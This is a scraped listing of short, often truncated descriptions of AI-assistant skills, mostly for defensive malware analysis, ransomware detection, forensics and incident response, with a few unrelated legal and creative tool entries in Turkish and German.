Researches malware analysis, CVEs, attribution reports, and hacker community sources. Use when the album subject involves cybersecurity incidents or threat actors.
Write and test YARA rules for malware detection and threat hunting. Use when creating YARA signatures, detecting malware families, scanning files or memory for indicators of…
Pre-add risk gate for a new dependency — composes vuln history (`vdb vulns`), AI-malware check (`vdb ai-malware`), license compatibility, EOL status, maintainer health,…
Bir tanık veya taraf (isticvap) için duruşma/ifade soru taslağı (outline) hazırlar — şirket içi belgeleri veya UYAP evraklarını çeker, hukuki teori etrafında başlıkları düzenler…
Android APK analysis using GDA.exe. AI drives analysis by tracing code paths, extracting IOCs (including encrypted), and producing structured malware reports.
Pixa.com (eski Pixelcut) — Claude'a MCP-native baglanan yaratici AI araclari. Arka plan kaldir, gorsel olustur, kalite iyilestir, video olustur, nesne sil. API anahtari gerekmez.
Typosquat and malicious-package detection across installed dependencies (or a single prospective addition) — cross-checks AI-malware family intelligence, package-name similarity…
YARA rule creation, testing, and deployment
GitHub, Anthropic blog ve topluluk kaynaklarını tarayarak yeni Claude skill/MCP/tool keşfeder. REPO_CATALOG.md'ye ekler, /ai-upgrade'e hazır hale getirir.
Inspect captured RAM images to enumerate processes, modules, handles, and suspicious in-memory behavior before escalation or evidence handoff.
Perform static analysis of Android APK malware samples using apktool for decompilation, jadx for Java source
Analyzes bootkit and advanced rootkit malware that infects the Master Boot Record (MBR), Volume Boot Record
Reverse engineer Go-compiled malware using Ghidra with specialized scripts for function recovery, string extraction,
Performs runtime mobile security exploration of iOS applications using Objection, a Frida-powered toolkit that
Analyzes malicious Linux ELF (Executable and Linkable Format) binaries including botnets, cryptominers, ransomware,
Analyzes malicious VBA macros embedded in Microsoft Office documents (Word, Excel, PowerPoint) to identify download
Executes malware samples in Cuckoo Sandbox to observe runtime behavior including process creation, file system
Use Sysinternals Autoruns to systematically identify and analyze malware persistence mechanisms across registry
Detect sandbox evasion techniques in malware samples by analyzing timing checks, VM artifact queries, user interaction
Detect and analyze covert communication channels used by malware including DNS tunneling, ICMP exfiltration,
Identifies and unpacks UPX-packed and other packed malware samples to expose the original executable code for
Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to identify embedded JavaScript, shellcode,
Analyzes encryption algorithms, key management, and file encryption routines used by ransomware families to
Monitor and analyze ransomware group data leak sites (DLS) to track victim postings, extract threat intelligence
Identify ransomware network indicators including C2 beaconing patterns, TOR exit node connections, data exfiltration
Traces ransomware cryptocurrency payment flows using blockchain analysis tools such as Chainalysis Reactor,
Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines,
Decompile Android APK, XAPK, JAR, and AAR files using jadx or Fernflower/Vineflower. Reverse engineer Android apps, extract HTTP API endpoints, trace call flows from UI to network…
Builds an automated malware submission and analysis pipeline that collects suspicious files from endpoints and
Build structured communication templates for malware incidents including stakeholder notifications, executive
Builds a structured ransomware incident response playbook aligned with the CISA StopRansomware Guide and NIST
Builds a structured SOC incident response playbook for ransomware attacks covering detection, containment, eradication,
Static analysis of UEFI/BIOS firmware dumps using Intel's chipsec framework. Decode firmware structure, detect known malware and rootkits (LoJax, ThinkPwn, HackingTeam,…
Expert CIS Controls v8 (CIS Top 18) advisor — implementation group scoping (IG1/IG2/IG3), control gap assessments, safeguard-level guidance, asset inventory, software inventory,…
Responds to malware infections across enterprise endpoints by identifying the malware family, determining infection
Performs memory forensics analysis using Volatility 3 to extract evidence of malware execution, process injection,
Malware and network analysis techniques for CTF challenges. Use when analyzing obfuscated scripts, malicious packages, custom protocols, or C2 traffic.
Deobfuscates malicious JavaScript code used in web-based attacks, phishing pages, and dropper scripts by reversing
Systematically deobfuscate multi-layer PowerShell malware using AST analysis, dynamic tracing, and tools like
Deploys canary files (honeytokens) across file systems to detect ransomware encryption activity in real time.
Deploys and monitors ransomware canary files across critical directories using Python''s watchdog library for
Detects and analyzes fileless malware that operates entirely in memory using PowerShell, WMI, .NET reflection,
Detects and analyzes malicious behavior in mobile applications through behavioral analysis, permission abuse
Detects ransomware encryption activity in real time using entropy analysis, file system I/O monitoring, and
Detects early-stage ransomware indicators in network traffic before encryption begins, including initial access
Kullanıcının belirttiği anahtar kelimeleri ve sayısal hedefleri kullanarak yaratıcı ve akılda kalıcı domain isimleri listeler. Kısa versiyon taleplerine göre uzunluk ayarı yapar.
Systematically remove malware, backdoors, and attacker persistence mechanisms from infected systems while ensuring
Extract embedded configuration from Agent Tesla RAT samples including SMTP/FTP/Telegram exfiltration credentials,
Extracts indicators of compromise (IOCs) from malware samples including file hashes, network indicators (IPs,
Cyber-Vorfall-Sofortmassnahmen Ransomware Datenleck Hack. Meldepflichten 72 Stunden Art 33 DSGVO BSIG NIS2UmsuCG kritische Infrastruktur.
Cyber-Versicherung bei Ransomware mit Sanktions-Risiko OFAC EU-VO 833/2014 VO 269/2014 Russland-Sanktionen. Deckungs-Abwehr Versicherer bei Loesegeld-Zahlung.
Use when designing malware and content scanning for files uploaded to Salesforce (Files, Attachments, ContentVersion) — external scanning service callouts, quarantine patterns,…
Quantitative trading expertise for DeFi and crypto derivatives. Use when building trading strategies, signals, risk management.
Supply-chain malware infection scanner. IoC-based local scan + safe eradication for npm/PyPI worm campaigns (Mini Shai-Hulud 1st/2nd, S1ngularity, lottie-player).
Configures Windows Group Policy Objects (GPO) to prevent ransomware execution and limit its spread. Implements
Email sandboxing detonates suspicious attachments and URLs in isolated environments to detect zero-day malware
Configure Google Workspace advanced phishing and malware protection settings including pre-delivery scanning,
Deploys canary files, honeypot shares, and decoy systems to detect ransomware activity at the earliest possible
Implements immutable backup strategy using restic with S3-compatible storage and object lock for ransomware-resistant
Deploy and configure Proofpoint Email Protection as a secure email gateway to detect and block phishing, malware,